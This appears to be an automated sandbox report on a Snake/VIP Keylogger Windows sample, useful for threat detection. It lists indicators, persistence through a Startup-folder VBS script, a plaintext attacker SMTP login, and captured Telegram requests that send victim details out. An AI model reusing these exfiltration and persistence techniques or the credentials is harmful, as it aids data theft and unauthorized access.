
Windows Analysis Report
pbgjw8i8N7.exe

Overview

General Information

Sample name: pbgjw8i8N7.exe (renamed because the original name is a hash value)
Original sample name: 44095f79a9e682a29ed75fab33f6dcf1e2f11937097e4c7e3f84080ff7444048.exe
Analysis ID: 1634876
MD5: 679da76a671452de2f13a1585028e74e
SHA1: e89c5b5d3b31025710714c14955d22820e2ed493
SHA256: 44095f79a9e682a29ed75fab33f6dcf1e2f11937097e4c7e3f84080ff7444048
Tags: exe, SnakeKeylogger, user-adrian__luca

Detection

Snake Keylogger, VIP Keylogger
Score: 100 (range 0 - 100)
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
Drops VBS files to the startup folder
Joe Sandbox ML detected suspicious sample
Sample uses string decryption to hide its real strings
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • pbgjw8i8N7.exe (PID: 1988 cmdline: "C:\Users\user\Desktop\pbgjw8i8N7.exe" MD5: 679DA76A671452DE2F13A1585028E74E)
    • InstallUtil.exe (PID: 8068 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • wscript.exe (PID: 6828 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XsdType.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • XsdType.exe (PID: 6732 cmdline: "C:\Users\user\AppData\Roaming\XsdType.exe" MD5: 679DA76A671452DE2F13A1585028E74E)
      • InstallUtil.exe (PID: 7500 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
Extracted malware configuration: {"Exfil Mode": "SMTP", "Email ID": "bank@iaa-airferight.com", "Password": "moneyismade22", "Host": "mail.iaa-airferight.com", "Port": "25"}
Source | Rule | Description | Author
00000001.00000002.2570925272.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
00000000.00000002.1353040747.0000000005380000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
00000003.00000002.1478818577.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000003.00000002.1478818577.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
00000003.00000002.1478818577.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
(5 of 40 entries shown)

Source | Rule | Description | Author
0.2.pbgjw8i8N7.exe.5380000.6.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
0.2.pbgjw8i8N7.exe.5380000.6.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
1.2.InstallUtil.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
1.2.InstallUtil.exe.400000.0.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
1.2.InstallUtil.exe.400000.0.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
(5 of 32 entries shown)

                      System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XsdType.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XsdType.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3084, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XsdType.vbs" , ProcessId: 6828, ProcessName: wscript.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 46.175.148.58, DestinationIsIpv6: false, DestinationPort: 25, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Initiated: true, ProcessId: 8068, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49751
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XsdType.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XsdType.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3084, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XsdType.vbs" , ProcessId: 6828, ProcessName: wscript.exe

                      Data Obfuscation

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\Desktop\pbgjw8i8N7.exe, ProcessId: 1988, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XsdType.vbs
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-11T06:10:07.153657+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49714 | 104.21.96.1 | 443 | TCP
2025-03-11T06:10:18.915468+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49719 | 104.21.96.1 | 443 | TCP
2025-03-11T06:10:30.004518+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49726 | 104.21.96.1 | 443 | TCP
2025-03-11T06:10:34.050375+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49729 | 104.21.96.1 | 443 | TCP
2025-03-11T06:10:49.188792+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49748 | 104.21.96.1 | 443 | TCP
2025-03-11T06:10:52.152063+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49750 | 104.21.96.1 | 443 | TCP
2025-03-11T06:09:59.024815+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49712 | 158.101.44.242 | 80 | TCP
2025-03-11T06:10:04.872621+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49712 | 158.101.44.242 | 80 | TCP
2025-03-11T06:10:16.717744+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49715 | 158.101.44.242 | 80 | TCP
2025-03-11T06:10:24.107212+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49716 | 158.101.44.242 | 80 | TCP
2025-03-11T06:10:27.857004+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49716 | 158.101.44.242 | 80 | TCP
2025-03-11T06:10:30.716397+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49728 | 158.101.44.242 | 80 | TCP
2025-03-11T06:10:45.740940+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.5 | 49745 | 149.154.167.220 | 443 | TCP
2025-03-11T06:10:54.564569+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.5 | 49753 | 149.154.167.220 | 443 | TCP


                      AV Detection

Source: pbgjw8i8N7.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\XsdType.exe | Avira: detection malicious, Label: TR/AD.GenSteal.frzkf
Source: 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "bank@iaa-airferight.com", "Password": "moneyismade22", "Host": "mail.iaa-airferight.com", "Port": "25"}
Source: C:\Users\user\AppData\Roaming\XsdType.exe | Virustotal: Detection: 70%
Source: C:\Users\user\AppData\Roaming\XsdType.exe | ReversingLabs: Detection: 63%
Source: pbgjw8i8N7.exe | Virustotal: Detection: 70%
Source: pbgjw8i8N7.exe | ReversingLabs: Detection: 63%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 3.2.XsdType.exe.3bbbdb0.2.unpack | String decryptor: bank@iaa-airferight.com
Source: 3.2.XsdType.exe.3bbbdb0.2.unpack | String decryptor: moneyismade22
Source: 3.2.XsdType.exe.3bbbdb0.2.unpack | String decryptor: mail.iaa-airferight.com
Source: 3.2.XsdType.exe.3bbbdb0.2.unpack | String decryptor: 25
Source: 3.2.XsdType.exe.3bbbdb0.2.unpack | String decryptor: (empty string)

                      Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: pbgjw8i8N7.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49713 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49723 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49745 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49753 version: TLS 1.2
Source: pbgjw8i8N7.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: pbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1353607165.00000000054D0000.00000004.08000000.00040000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003A7C000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: pbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1353607165.00000000054D0000.00000004.08000000.00040000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003A7C000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: pbgjw8i8N7.exe, 00000000.00000002.1353290642.0000000005430000.00000004.08000000.00040000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003A11000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: pbgjw8i8N7.exe, 00000000.00000002.1353290642.0000000005430000.00000004.08000000.00040000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003A11000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Users\user\Desktop\pbgjw8i8N7.exe | Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h (0_2_04E903C4)
Source: C:\Users\user\Desktop\pbgjw8i8N7.exe | Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h (0_2_04E903D0)
Source: C:\Users\user\Desktop\pbgjw8i8N7.exe | Code function: 4x nop then jmp 0525428Bh (0_2_05254423)
Source: C:\Users\user\Desktop\pbgjw8i8N7.exe | Code function: 4x nop then jmp 0525428Bh (0_2_052540A8)
Source: C:\Users\user\Desktop\pbgjw8i8N7.exe | Code function: 4x nop then jmp 0525428Bh (0_2_05254098)
Source: C:\Users\user\Desktop\pbgjw8i8N7.exe | Code function: 4x nop then jmp 0525428Bh (0_2_0525424E)
Source: C:\Users\user\Desktop\pbgjw8i8N7.exe | Code function: 4x nop then jmp 0526DEB9h (0_2_0526DE49)
Source: C:\Users\user\Desktop\pbgjw8i8N7.exe | Code function: 4x nop then jmp 0526DEB9h (0_2_0526DE58)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-38h] (1_2_00CE6B28)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-38h] (1_2_00CE7CA0)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 028DF5BDh (1_2_028DF420)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 028DF5BDh (1_2_028DF68F)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 028DF5BDh (1_2_028DF60C)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 028DFDA0h (1_2_028DFAC1)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 064B28EAh (1_2_064B2610)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 064B3040h (1_2_064B2C28)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h (1_2_064B0673)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 064BF8F8h (1_2_064BF628)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 064BD908h (1_2_064BD638)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 064BDD98h (1_2_064BDAC8)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 064BFD88h (1_2_064BFAB8)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 064BE228h (1_2_064BDF58)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 064B3040h (1_2_064B2F6E)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 064B0D0Dh (1_2_064B0B30)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 064B16F8h (1_2_064B0B30)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 064BE6B8h (1_2_064BE3E8)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h (1_2_064B0040)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h (1_2_064B0853)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 064BEB48h (1_2_064BE878)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 064B3040h (1_2_064B2C1A)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 064BEFD8h (1_2_064BED08)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 064BF468h (1_2_064BF198)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 064BD478h (1_2_064BD1A8)
Source: C:\Users\user\AppData\Roaming\XsdType.exe | Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h (3_2_050603C4)
Source: C:\Users\user\AppData\Roaming\XsdType.exe | Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h (3_2_050603D0)
Source: C:\Users\user\AppData\Roaming\XsdType.exe | Code function: 4x nop then jmp 052E428Bh (3_2_052E441B)
Source: C:\Users\user\AppData\Roaming\XsdType.exe | Code function: 4x nop then jmp 052E428Bh (3_2_052E40A8)
Source: C:\Users\user\AppData\Roaming\XsdType.exe | Code function: 4x nop then jmp 052E428Bh (3_2_052E4098)
Source: C:\Users\user\AppData\Roaming\XsdType.exe | Code function: 4x nop then jmp 052E428Bh (3_2_052E424E)
Source: C:\Users\user\AppData\Roaming\XsdType.exe | Code function: 4x nop then jmp 052FDEB9h (3_2_052FDE49)
Source: C:\Users\user\AppData\Roaming\XsdType.exe | Code function: 4x nop then jmp 052FDEB9h (3_2_052FDE58)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-38h] (4_2_00626ADC)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-38h] (4_2_00627E40)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 0228F45Dh (4_2_0228F2C0)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 0228F45Dh (4_2_0228F4AC)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 0228FC40h (4_2_0228F961)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 05E632C8h (4_2_05E62EB0)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 05E62CEAh (4_2_05E62A10)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 05E6EFF0h (4_2_05E6ED20)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 05E6E6D0h (4_2_05E6E400)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 05E6E240h (4_2_05E6DF70)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h (4_2_05E60673)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 05E6F910h (4_2_05E6F640)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 05E6D920h (4_2_05E6D650)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 05E632C8h (4_2_05E631F6)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 05E6D490h (4_2_05E6D1C0)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 05E6F480h (4_2_05E6F1B0)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 05E6EB60h (4_2_05E6E890)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h (4_2_05E60040)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h (4_2_05E60853)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 05E60D0Dh (4_2_05E60B30)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 05E616F8h (4_2_05E60B30)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 05E6DDB0h (4_2_05E6DAE0)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 05E6FDA0h (4_2_05E6FAD0)

                      Networking

Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49753 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49745 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive (12 identical requests listed)
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org (6 identical requests listed)
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841618%0D%0ADate%20and%20Time:%2012/03/2025%20/%2023:06:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841618%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
  (URL-decoded text parameter, line breaks shown as "; "): PC Name:841618; Date and Time: 12/03/2025 / 23:06:52; Country Name: United States; [ 841618 Clicked on the File If you see nothing this's mean the system storage's empty. ]
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841618%0D%0ADate%20and%20Time:%2012/03/2025%20/%2005:49:32%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841618%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
  (URL-decoded text parameter, line breaks shown as "; "): PC Name:841618; Date and Time: 12/03/2025 / 05:49:32; Country Name: United States; [ 841618 Clicked on the File If you see nothing this's mean the system storage's empty. ]
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 46.175.148.58
Source: Joe Sandbox View | IP Address: 104.21.96.1
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49728 -> 158.101.44.242:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49715 -> 158.101.44.242:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49716 -> 158.101.44.242:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49712 -> 158.101.44.242:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49719 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49748 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49714 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49729 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49726 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49750 -> 104.21.96.1:443
Source: global traffic | TCP traffic: 192.168.2.5:49751 -> 46.175.148.58:25
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
